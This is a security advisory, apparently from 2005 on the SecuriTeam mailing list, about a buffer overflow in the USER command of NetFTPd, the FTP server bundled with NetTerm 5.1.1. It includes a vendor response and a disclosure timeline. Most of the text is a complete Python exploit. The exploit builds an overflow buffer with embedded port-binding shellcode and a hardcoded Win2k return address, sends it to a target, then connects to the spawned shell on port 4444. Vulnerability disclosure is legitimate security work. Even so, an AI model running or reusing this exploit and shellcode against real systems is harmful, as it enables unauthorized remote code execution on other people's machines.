[EXPL] NetTerm's NetFTPd Buffer Overflow (USER, Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  NetTerm's NetFTPd Buffer Overflow (USER, Exploit)
------------------------------------------------------------------------


SUMMARY

 <http://www.securenetterm.com/html/netterm.html> NetTerm is widely used 
Win32 telnet client software - "NetTerm is a network terminal which can 
act as a telnet client, direct connect terminal and modem connected 
terminal to hosts that support the telnet protocol or dial-in modems."

A buffer overflow vulnerability exists in NetFTPd - an FTP server supplied 
with NetTerm software. Exploiting this vulnerability allows remote 
attackers to execute malicious code on vulnerable system.

DETAILS

Vulnerable Systems:
 * NetFTPd supplied with NetTerm version 5.1.1

Immune Systems:
 * NetTerm version 5.1.1.1 ( 
<http://www.securenetterm.com/html/what_s_new.html> NetFTPd has  been 
removed from the release).

NetTerm's NetFTPd has a buffer overflow on authentication buffer. 'USER' 
command was tested, but probably other commands are vulnerable as well. 
Attached is a working exploit for Win2k, any SP.

Exploit:
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

class warftpd:
 def __init__(self, host, port):
  self.host  = host
  self.port  = port
  self.bsize  = 512
  self.ebpaddr = 0xcacacaca
  self.retaddr = 0xdeadbeef
  self.sctype  = 'findskt'
  self.scport  = None

 def setebpaddr(self, addr):
  self.ebpaddr = addr

 def setretaddr(self, addr):
  self.retaddr = addr

 def setbsize(self, size):
  self.bsize = size

 def setsctype(self, type):
  self.sctype = type

 def setscport(self, port):
  self.scport = port

 def genbuffer(self):
  ##
  # Alpha port bind 4444, thanx metasploit
  ##
  sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x51\x5a\x6a\x46"
  sc += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x32\x42\x41\x32"
  sc += "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x6b\x4c\x70"
  sc += "\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x6f\x6b\x4f\x61"
  sc += "\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x75\x45\x6c\x4c"
  sc += "\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x6b\x50\x4f\x57"
  sc += "\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x73\x50\x30\x37"
  sc += "\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x71\x4b\x70\x4a"
  sc += "\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x71\x6b\x7a\x56"
  sc += "\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x74\x61\x34\x76"
  sc += "\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x71\x5a\x4b\x50"
  sc += "\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x4c\x75\x51\x38"
  sc += "\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x74\x47\x6c\x63"
  sc += "\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x30\x30\x30\x4c"
  sc += "\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x4d\x4e\x6b\x71"
  sc += "\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x4e\x68\x6c\x70"
  sc += "\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x73\x53\x56\x30"
  sc += "\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x62\x63\x6f\x36"
  sc += "\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x6c\x57\x4b\x56"
  sc += "\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x36\x4c\x41\x48"
  sc += "\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x4f\x38\x50\x35"
  sc += "\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x6f\x6e\x36\x56"
  sc += "\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x53\x67\x33\x36"
  sc += "\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x6c\x41\x76\x72"
  sc += "\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x5a\x74\x30\x4a"
  sc += "\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x71\x53\x65\x6b"
  sc += "\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x79\x30\x57\x79"
  sc += "\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x48\x4d\x35\x67"
  sc += "\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x70\x63\x64\x61"
  sc += "\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x57\x72\x59\x6a"
  sc += "\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x4f\x6a\x70\x70"
  sc += "\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x4d\x6c\x49\x68"
  sc += "\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x79\x4d\x37\x61"
  sc += "\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x53\x4c\x6a\x59"
  sc += "\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x53\x4e\x6d\x42"
  sc += "\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x32\x6b\x4e\x4d"
  sc += "\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x66\x33\x6b\x53"
  sc += "\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x41\x56\x31\x32"
  sc += "\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x6d\x4a\x79\x47"
  sc += "\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x4f\x6b\x4f\x35"
  sc += "\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x53\x68\x44\x41"
  sc += "\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x38\x6c\x30\x4f"
  sc += "\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x4f\x38\x50\x46"
  
  # shellcode
  #sc  = 
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
  #sc  += 
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
  #sc  += 
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
  #sc  += 
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
  #sc  += 
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
  #sc  += 
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
  #sc  += 
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
  #sc  += 
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
  #sc  += 
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
  #sc  += 
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
  #sc  += 
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
  #sc  += 
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
  #sc  += 
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
  #sc  += 
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
  #sc  += 
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
  #sc  += 
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
  #sc  += 
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
  #sc  += 
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
  #sc  += 
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
  #sc  += 
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
  #sc  += 
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
  #sc  += 
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
  #sc  += 
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
  #sc  += 
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
  #sc  += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
  # other stuff
  nops = "\x41"*(self.bsize-len(sc)-50)
  ebp = struct.pack('<L', self.ebpaddr)
  # check if the value is an integer, otherwise it should be a string
  if self.retaddr.__class__.__name__ == 'int':
   ret = struct.pack('<L', self.retaddr)
  else:
   ret = self.retaddr
  # assemble buffer to send
  buffer = "USER "
  buffer += nops
  buffer += sc
  buffer += '\x42'*(50-4)
  buffer += ebp
  buffer += ret
  return buffer

 def exploit(self):
  # connect
  skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
   skt.connect((self.host, self.port))
  except socket.error, err:
   print "[-] Error: %s" % err[1]
   return None
  print "[+] Connected to %s:%d" % (self.host, self.port)
  # recv banner
  print "[+] Receiving Banner"
  res = skt.recv(100)
  print res
  # send payload
  time.sleep(1)
  print "[+] Sending payload"
  skt.send(self.genbuffer())
  time.sleep(2) # test on mcafee anti-b0f
  skt.close()
  # if successfull connect to the shell
  time.sleep(2)
  skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
   skt.connect((self.host, 4444))
  except socket.error, err:
   print "[-] Error: %s" % err[1]
   print "[-] Explotation failed\n[-] Daemon should be dead..."
   return None
  print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
  res = skt.recv(1024)
  if res:
   if res.count('Microsoft Windows'):
    print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
    from telnetlib import Telnet
    telnet = Telnet()
    telnet.sock = skt
    try:
     telnet.interact()
    except:
     pass
    skt.close()
    print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
    return None
  skt.close()
  print '[-] Explotation failed\nDaemon should be dead...'

if __name__ == '__main__':
 if len(sys.argv) != 3:
  print "*************************************"
  print "* Coded by Sergio 'shadown' Alvarez *"
  print "*          shadown@gmail.com        *"
  print "*************************************"
  print "Usage: %s host port" % sys.argv[0]
  sys.exit(1)

 exp = warftpd(sys.argv[1], int(sys.argv[2]))
 exp.setsctype('findskt')
 exp.setscport(1234)
 exp.setbsize(1014)
 exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
 exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 
(jmp to our input buffer)
 exp.exploit()

Disclosure Timeline:
21.04.05 - Discovery date
26.04.05 - Reported
26.04.05 - Vendor Response
26.04.05 - Public Advisory

Vendor Response:
"This is a known bug that has been reported to our clients.

Netftpd was a free addition to our NetTerm product, at the request of our 
clients. They were warned to never use netftpd as a general purpose ftp 
server, and to only use it behind a firewall. However, it does still 
present a potential problem, so we have removed it from the NetTerm 
distribution. Our www site at www.netterm.com and www.securenetterm.com 
has been updated with a version of NetTerm that does not contain the 
netftpd.exe program. We will also update the What's New page on both web 
sites for the new release in the next two days.

Thanks for bringing to to our attention.
Ken"


ADDITIONAL INFORMATION

The information has been provided by  <mailto:shadown@gmail.com> Sergio 
'shadown' Alvarez.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.